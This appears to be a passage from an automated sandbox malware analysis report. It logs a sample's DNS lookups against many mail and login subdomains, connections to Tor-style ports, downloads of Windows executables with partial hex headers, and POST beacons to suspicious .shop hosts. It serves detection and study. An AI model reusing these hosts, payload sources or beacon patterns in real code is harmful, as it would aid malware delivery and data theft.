                  Source: unknownDNS traffic detected: query: mail.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.steamcommunity.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.hamgam.medu.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ghaazalrad.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.my.bigcartel.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.shaninjah.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.framalistes.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: gouvernement.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.help.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.account.ubisoft.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.pma.capricehost.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.5euros.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.prepaiddigitalsolutions.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.shaninjah.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.lsoccaz.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.prepaiddigitalsolutions.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.exacyc.orion.education.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.account.ubisoft.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.steamcommunity.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.lsoccaz.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.help.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.login.aliexpress.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.shaninjah.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.steamcommunity.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.accounts.google.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.framalistes.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.ghaazalrad.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.account.ubisoft.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.pma.capricehost.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.login.paysafecard.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.forum.cfx.re replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.app.userfeel.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.shaninjah.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.exacyc.orion.education.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.exacyc.orion.education.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.pma.capricehost.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.login.aliexpress.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.insurance.ifsm.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.linkvertise.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.steamcommunity.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.namava.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.insurance.ifsm.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.accounts.google.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.exacyc.orion.education.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.5euros.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.account.ubisoft.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.passport.twitch.tv replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.login.aliexpress.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.pma.capricehost.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.linkvertise.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.hamgam.medu.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.accounts.google.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.espace-client-red.sfr.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.lsoccaz.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.login.aliexpress.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.ghaazalrad.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.app.userfeel.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.accounts.google.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.namava.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.hamgam.medu.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.ghaazalrad.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.passport.twitch.tv replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.prepaiddigitalsolutions.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.espace-client-red.sfr.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.steamcommunity.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.5euros.com replaycode: Name error (3)
                  Source: unknownNetwork traffic detected: DNS query count 333
                  Source: unknownNetwork traffic detected: IP country count 19
                  Source: global trafficTCP traffic: 192.168.2.9:49717 -> 45.125.65.112:9001
                  Source: global trafficTCP traffic: 192.168.2.9:49719 -> 8.209.79.125:9001
                  Source: global trafficTCP traffic: 192.168.2.9:49721 -> 188.26.207.181:19001
                  Source: global trafficTCP traffic: 192.168.2.9:49741 -> 124.168.18.172:9001
                  Source: global trafficTCP traffic: 192.168.2.9:49754 -> 149.34.27.137:9001
                  Source: global trafficTCP traffic: 192.168.2.9:49770 -> 88.80.145.14:2023
                  Source: global trafficTCP traffic: 192.168.2.9:49785 -> 185.220.101.1:30001
                  Source: global trafficTCP traffic: 192.168.2.9:49794 -> 185.220.101.143:10143
                  Source: global trafficTCP traffic: 192.168.2.9:49795 -> 128.31.0.39:9101
                  Source: global trafficTCP traffic: 192.168.2.9:49804 -> 62.210.105.46:9001
                  Source: global trafficTCP traffic: 192.168.2.9:49818 -> 85.195.253.142:9005
                  Source: global trafficTCP traffic: 192.168.2.9:49846 -> 144.217.32.158:9004
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:08:01 GMTContent-Type: application/octet-streamContent-Length: 8336105Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=may.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N2teumzEy89MKUeeoEigfopykvJj28IGlNnuWbetT7AxM0qMG%2FDXfxRPS0Fjf1az1WWh4txLH4DAssgD%2BhCjaSSQEs35Q4XH6dgJhP9ge4Jk7SnAt72g%2FUPQS0th%2BbHI4bjX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8525d0c528a91399-ATLalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 08 Feb 2024 18:08:04 GMTContent-Type: application/octet-streamContent-Length: 9104384Last-Modified: Fri, 02 Feb 2024 16:13:27 GMTConnection: keep-aliveETag: "65bd14a7-8aec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 08 Feb 2024 18:08:15 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=fde12b9d.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 11 7c c2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 28 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7d 02 00 04 00 00 d7 60 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 68 02 00 3c 00 00 00 00 50 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 65 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 26 02 00 00 10 00 00 00 28 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 40 02 00 00 32 00 00 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 80 02 00 00 1e 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 66 69 00 00 00 7c 00 00 00 00 10 7d 02 00 02 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 20 7d 02 00 0a 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 68 6f 70 65 62 0c 00 00 00 00 30 7d 02 00 02 00 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 69 64 65 78 69 00 00 04 00 00 00 40 7d 02 00 04 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 50 7d 02 00 1e 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Feb 2024 18:08:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 08 Feb 2024 18:00:02 GMTETag: "34e00-610e2949adafe"Accept-Ranges: bytesContent-Length: 216576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 0e 31 24 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ca 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 7e 02 00 04 00 00 02 42 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 08 03 00 3c 00 00 00 00 f0 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 05 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 c9 02 00 00 10 00 00 00 ca 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 e0 02 00 00 32 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 20 03 00 00 1e 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 6f 77 61 00 00 00 7c 00 00 00 00 b0 7d 02 00 02 00 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 c0 7d 02 00 0a 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 65 79 65 6b 75 73 0c 00 00 00 00 d0 7d 02 00 02 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 65 6a 6f 6c 00 00 00 04 00 00 00 e0 7d 02 00 04 00 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 f0 7d 02 00 1e 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 104.21.83.220 104.21.83.220
                  Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                  Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                  Source: Joe Sandbox ViewIP Address: 172.67.152.52 172.67.152.52
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 83d60721ecc423892660e275acc4dffd
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gemcreedarticulateod.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: secretionsuitcasenioise.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: claimconcessionrebe.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liabilityarrangemenyit.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=q42V.iCLZDxozAKhor79mYjzd4QGiDbwc6y4TRQBlOY-1707415685-0-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: liabilityarrangemenyit.shop
                  Source: global trafficHTTP traffic detected: GET /photo/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mmtplonline.com
